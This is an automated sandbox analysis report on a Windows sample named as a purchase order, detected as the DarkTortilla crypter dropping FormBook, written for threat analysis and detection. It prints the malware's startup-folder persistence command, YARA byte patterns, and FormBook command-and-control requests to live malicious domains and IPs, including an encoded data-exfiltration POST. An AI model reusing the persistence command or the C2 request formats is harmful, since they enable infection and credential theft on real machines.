Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO# 81136575.exe

Overview

General Information

Sample name:PO# 81136575.exe
Analysis ID:1564715
MD5:b353674e16431a7424571790d4d58f71
SHA1:eb356ac3d93bc0a61bd38929c3bdb46bbf6c1315
SHA256:1e474cdeeb0981210d4a74fd907bf35076bd839cdaed665bfcd6360557797895
Infos:

Detection

DarkTortilla, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Drops PE files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • PO# 81136575.exe (PID: 9020 cmdline: "C:\Users\user\Desktop\PO# 81136575.exe" MD5: B353674E16431A7424571790D4D58F71)
    • cmd.exe (PID: 5348 cmdline: "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 8584 cmdline: ping 127.0.0.1 -n 49 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 7428 cmdline: ping 127.0.0.1 -n 49 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • sage.exe (PID: 904 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" MD5: B353674E16431A7424571790D4D58F71)
        • AddInProcess32.exe (PID: 5716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • sages.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • sages.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
        • AddInProcess32.exe (PID: 3968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • sage.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" MD5: B353674E16431A7424571790D4D58F71)
    • AddInProcess32.exe (PID: 1096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • RAVCpl64.exe (PID: 7520 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • clip.exe (PID: 8692 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • firefox.exe (PID: 708 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
    • sages.exe (PID: 7024 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sages.exe (PID: 8000 cmdline: "C:\Users\user\AppData\Local\Temp\sages.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • AddInProcess32.exe (PID: 5156 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ba50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13c5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000E.00000002.5995803549.0000000004140000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ba50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13c5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 24 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        18.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          18.2.AddInProcess32.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ee63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          14.2.sage.exe.407aa5e.4.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            0.2.PO# 81136575.exe.471a7fe.7.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              0.2.PO# 81136575.exe.46c15fe.2.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                Click to see the 9 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Startup Folder File Write
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\PO# 81136575.exe, ProcessId: 9020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnk

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T18:56:51.299445+010020507451Malware Command and Control Activity Detected192.168.11.2049715172.67.149.5380TCP
                2024-11-28T18:57:16.148350+010020507451Malware Command and Control Activity Detected192.168.11.2049719217.70.184.5080TCP
                2024-11-28T18:57:30.197189+010020507451Malware Command and Control Activity Detected192.168.11.204972343.153.84.19080TCP
                2024-11-28T18:57:44.673982+010020507451Malware Command and Control Activity Detected192.168.11.204972723.225.34.7580TCP
                2024-11-28T18:57:58.403418+010020507451Malware Command and Control Activity Detected192.168.11.2049731104.21.53.9380TCP
                2024-11-28T18:58:12.156845+010020507451Malware Command and Control Activity Detected192.168.11.204973513.248.169.4880TCP
                2024-11-28T18:58:26.762980+010020507451Malware Command and Control Activity Detected192.168.11.2049739161.97.168.24580TCP
                2024-11-28T19:00:35.727456+010020507451Malware Command and Control Activity Detected192.168.11.204974484.32.84.3280TCP
                2024-11-28T19:00:50.833474+010020507451Malware Command and Control Activity Detected192.168.11.2049748208.91.197.2780TCP
                2024-11-28T19:01:05.738803+010020507451Malware Command and Control Activity Detected192.168.11.2049752172.247.159.6880TCP
                2024-11-28T19:01:20.102885+010020507451Malware Command and Control Activity Detected192.168.11.2049756172.172.168.24080TCP
                2024-11-28T19:01:34.500064+010020507451Malware Command and Control Activity Detected192.168.11.204976038.47.207.12080TCP
                2024-11-28T19:01:48.567273+010020507451Malware Command and Control Activity Detected192.168.11.2049764192.185.16.20980TCP
                2024-11-28T19:02:13.153245+010020507451Malware Command and Control Activity Detected192.168.11.2049765172.67.149.5380TCP
                2024-11-28T19:02:27.284955+010020507451Malware Command and Control Activity Detected192.168.11.2049769217.70.184.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: PO# 81136575.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.homebizsuccess.blogAvira URL Cloud: Label: malware
                Source: http://homebizsuccess.blog/sn35/?VX=2Ljw85fE62irHv4CO6sOxtyqmKbvzO49yiJy4Znj95JeAvira URL Cloud: Label: malware
                Source: http://www.homebizsuccess.blog/sn35/Avira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeAvira: detection malicious, Label: TR/AVI.Agent.lusxc
                Source: C:\Users\user\AppData\Local\Temp\sages.exeAvira: detection malicious, Label: TR/Agent.able
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\sages.exeReversingLabs: Detection: 83%
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeReversingLabs: Detection: 73%
                Multi AV Scanner detection for submitted file
                Source: PO# 81136575.exeReversingLabs: Detection: 73%
                Yara detected FormBook
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: PO# 81136575.exeJoe Sandbox ML: detected
                Source: PO# 81136575.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Drawing.pdb source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: clip.pdb source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: clip.pdbGCTL source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E1C010 FindFirstFileW,FindNextFileW,FindClose,24_2_02E1C010
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 4x nop then xor eax, eax14_2_0FCA74D0
                Source: C:\Users\user\AppData\Local\Temp\sages.exeCode function: 4x nop then jmp 01A30B9Fh21_2_01A30960
                Source: C:\Users\user\AppData\Local\Temp\sages.exeCode function: 4x nop then jmp 01A30B9Fh21_2_01A30955
                Source: C:\Users\user\AppData\Local\Temp\sages.exeCode function: 4x nop then jmp 026A0B9Fh22_2_026A0960
                Source: C:\Users\user\AppData\Local\Temp\sages.exeCode function: 4x nop then jmp 026A0B9Fh22_2_026A094F
                Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax24_2_02E09A90
                Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then pop edi24_2_02E0DC31
                Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h24_2_050F04E6

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49735 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49719 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49731 -> 104.21.53.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49723 -> 43.153.84.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49727 -> 23.225.34.75:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49752 -> 172.247.159.68:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49744 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49765 -> 172.67.149.53:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49739 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49756 -> 172.172.168.240:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49748 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49764 -> 192.185.16.209:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49760 -> 38.47.207.120:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49769 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49715 -> 172.67.149.53:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.gfdgdfery.xyz
                Uses ping.exe to check the status of other devices and networks
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: Joe Sandbox ViewIP Address: 217.70.184.50 217.70.184.50
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.1win-moldovia.funConnection: closeUser-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                Source: global trafficHTTP traffic detected: GET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.akravchenko.devConnection: closeUser-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                Source: global trafficHTTP traffic detected: GET /jywy/?YDrhw=DvQP9LC050182Z3&VX=eSCeWRIoJNy1ChkNr9Mrph+bw9krj2HtA4M0Ycvj+4uTwHyRXe49PM8qrTbeBTFYTaFawzZELf0uMSg9ynQv9wCKXjtU0s3V3zZMSDWRvxGcx4r7U6700ik= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.hubeisuizhou.netConnection: closeUser-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                Source: global trafficHTTP traffic detected: GET /wh2p/?VX=9+zt0j5vH1hwmuNu9M8ocWXwdarV/CDICdzwuxwNfU8HGUfYBmRRDoptJYgisjO2VNRkebPIiKpJv3rqkJwKZD01RYDx7edSJaNyhcvFUUhy7aDPpqjYjT4=&YDrhw=DvQP9LC050182Z3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.bashei.topConnection: closeUser-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                Source: global trafficHTTP traffic detected: GET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.1win-moldovia.funConnection: closeUser-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                Source: global trafficHTTP traffic detected: GET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.akravchenko.devConnection: closeUser-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                Source: global trafficDNS traffic detected: DNS query: www.1win-moldovia.fun
                Source: global trafficDNS traffic detected: DNS query: www.akravchenko.dev
                Source: global trafficDNS traffic detected: DNS query: www.hubeisuizhou.net
                Source: global trafficDNS traffic detected: DNS query: www.bashei.top
                Source: global trafficDNS traffic detected: DNS query: www.gfdgdfery.xyz
                Source: global trafficDNS traffic detected: DNS query: www.healthsolutions.top
                Source: global trafficDNS traffic detected: DNS query: www.affilamark.buzz
                Source: global trafficDNS traffic detected: DNS query: www.shedoes.top
                Source: global trafficDNS traffic detected: DNS query: www.torkstallningar.shop
                Source: global trafficDNS traffic detected: DNS query: www.aflaksokna.com
                Source: global trafficDNS traffic detected: DNS query: www.claudpinheiro.online
                Source: global trafficDNS traffic detected: DNS query: www.slwmarketing.online
                Source: global trafficDNS traffic detected: DNS query: www.56435.net
                Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
                Source: global trafficDNS traffic detected: DNS query: www.tyai36.top
                Source: global trafficDNS traffic detected: DNS query: www.homebizsuccess.blog
                Source: unknownHTTP traffic detected: POST /l1qb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Host: www.akravchenko.devOrigin: http://www.akravchenko.devReferer: http://www.akravchenko.dev/l1qb/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeUser-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 69 6b 47 41 31 6a 4b 4c 4b 6f 73 5a 6d 47 6e 74 4e 4c 67 66 61 62 76 53 57 31 6e 4b 64 38 58 4d 61 63 74 2f 65 35 57 6a 43 5a 2b 47 6f 58 77 66 57 53 45 2f 45 70 53 7a 78 75 6f 36 5a 6a 65 69 79 35 59 47 59 56 42 77 50 36 77 73 43 4f 47 32 73 76 30 63 52 43 66 71 4c 52 65 79 74 69 71 37 6c 6c 50 78 4b 57 65 2b 35 36 4c 48 34 65 47 4a 2b 36 79 6b 37 52 67 4e 42 76 63 58 67 59 66 67 2f 4e 74 79 74 6d 37 4a 6c 65 43 6d 56 7a 6d 48 47 45 4d 33 75 44 47 62 37 73 65 57 69 32 72 6a 79 43 32 38 6f 2f 2f 49 39 31 42 67 46 2f 6f 35 38 51 63 2b 67 3d 3d Data Ascii: VX=u8bQrE+on1LVrikGA1jKLKosZmGntNLgfabvSW1nKd8XMact/e5WjCZ+GoXwfWSE/EpSzxuo6Zjeiy5YGYVBwP6wsCOG2sv0cRCfqLReytiq7llPxKWe+56LH4eGJ+6yk7RgNBvcXgYfg/Ntytm7JleCmVzmHGEM3uDGb7seWi2rjyC28o//I91BgF/o58Qc+g==
